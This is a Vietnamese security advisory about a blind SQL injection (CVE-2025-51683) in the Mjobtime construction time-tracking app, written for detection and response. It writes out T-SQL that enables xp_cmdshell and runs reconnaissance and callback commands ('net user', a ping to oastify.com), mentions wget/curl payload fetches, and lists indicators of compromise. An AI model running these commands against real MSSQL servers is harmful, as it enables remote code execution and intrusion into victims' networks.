Các công ty xây dựng đang trở thành mục tiêu ngày càng gia tăng của các tác nhân độc hại, khai thác điểm yếu trong phần mềm kinh doanh được triển khai tại các công trường. Một trong những mục tiêu mới nhất được xác định là ứng dụng theo dõi thời gian xây dựng Mjobtime, thường được triển khai trên Microsoft IIS với cơ sở dữ liệu MSSQL ở phần backend. Đây là một lỗ hổng CVE nghiêm trọng ảnh hưởng đến hệ thống.
Mục tiêu Mjobtime và Lỗ hổng SQL Injection
Mjobtime phiên bản 15.7.2 chứa một lỗ hổng Blind SQL Injection, được theo dõi là CVE-2025-51683. Lỗ hổng này cho phép những kẻ tấn công từ xa gửi các yêu cầu HTTP POST được chế tạo đặc biệt đến endpoint /Default.aspx/update_profile_Server của ứng dụng.
Việc này buộc cơ sở dữ liệu phải thực thi các lệnh hệ thống. Đây là một con đường tấn công trực tiếp từ một biểu mẫu web công khai vào công cụ cơ sở dữ liệu. Kẻ tấn công có thể lạm dụng các tính năng mạnh mẽ dành cho quản trị viên.
Chi tiết kỹ thuật CVE-2025-51683
Lỗ hổng Blind SQL Injection cho phép ứng dụng web chuyển dữ liệu đầu vào do kẻ tấn công kiểm soát đến backend MSSQL mà không có kiểm tra hợp lệ. Điều này giúp kẻ xâm nhập thao túng các truy vấn mà ứng dụng thực thi trên cơ sở dữ liệu.
Qua nhiều yêu cầu, kẻ tấn công sử dụng quyền kiểm soát này để kích hoạt xp_cmdshell trên phiên bản Mjobtime MSSQL. Sau đó, các lệnh cấp hệ thống được thực thi.
Khi xp_cmdshell được kích hoạt, máy chủ cơ sở dữ liệu thực tế trở thành một shell từ xa đằng sau tường lửa. Điều này có thể đạt được thông qua những gì trông giống như lưu lượng truy cập web bình thường.
Kịch bản Khai thác và Ảnh hưởng Hệ thống
Trong các sự cố thực tế, lưu lượng độc hại đầu tiên xuất hiện trong nhật ký IIS dưới dạng các yêu cầu POST lặp đi lặp lại đến endpoint dễ bị tấn công. Tiếp theo là việc kích hoạt thủ tục lưu trữ mở rộng xp_cmdshell trong phiên bản Mjobtime MSSQL.
Khi được kích hoạt, xp_cmdshell cho phép kẻ tấn công thực thi các lệnh hệ điều hành với quyền của tài khoản dịch vụ. Điều này thường mang lại cho kẻ tấn công quyền kiểm soát sâu rộng đối với máy chủ Windows.
Ví dụ Thực thi Lệnh từ xa
Các nhà phân tích từ Huntress đã ghi nhận mô hình tấn công này trong ba môi trường khách hàng riêng biệt trong năm 2025. Tất cả đều liên quan đến triển khai Mjobtime trong lĩnh vực xây dựng. Điều này cho thấy nguy cơ remote code execution là có thật.
Trong trường hợp đầu tiên, kẻ tấn công đã sử dụng xp_cmdshell để chạy các lệnh như cmd /c net user và thực hiện ping đến một tên miền bên ngoài (oastify.com). Đây là những dấu hiệu rõ ràng của việc khám phá hệ thống và kiểm tra callback từ máy chủ cơ sở dữ liệu bị xâm nhập.
-- Kích hoạt xp_cmdshell (nếu chưa được kích hoạt)
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
-- Thực thi lệnh ví dụ
EXEC xp_cmdshell 'cmd /c net user';
EXEC xp_cmdshell 'ping oastify.com';Trong hai trường hợp khác, những kẻ tấn công đã cố gắng tải payload từ xa bằng cách sử dụng wget và curl. Tuy nhiên, chúng đã bị chặn trước khi có thể tiến hành các giai đoạn tiếp theo của cuộc xâm nhập. Chi tiết về các sự cố này có thể được tìm thấy tại Huntress Blog.
Hậu quả và Nguy cơ Xâm nhập
Việc khai thác thành công lỗ hổng này không chỉ làm lộ dữ liệu nhạy cảm của dự án xây dựng và bảng lương. Nó còn cung cấp một chỗ đứng cho kẻ tấn công để di chuyển sâu hơn vào mạng nếu không được ngăn chặn nhanh chóng. Khả năng chiếm quyền điều khiển hoàn toàn hệ thống là rất cao.
Các Chỉ số Thỏa hiệp (IOCs)
Dựa trên các cuộc tấn công được ghi nhận, các chỉ số thỏa hiệp sau đây có thể được sử dụng để phát hiện hoạt động độc hại:
- Tên miền độc hại:
oastify.com - Endpoint bị tấn công:
/Default.aspx/update_profile_Server - Lệnh hệ thống được thực thi:
cmd /c net userping [tên miền]wget [URL payload]curl [URL payload]
- Tính năng MSSQL bị lạm dụng:
xp_cmdshell - Kiểu yêu cầu HTTP:
POST(lặp đi lặp lại)
Sự xuất hiện của các dấu hiệu này trong nhật ký IIS hoặc nhật ký cơ sở dữ liệu MSSQL cần được coi là cảnh báo về một cuộc tấn công đang diễn ra hoặc đã xảy ra thông qua lỗ hổng CVE này.
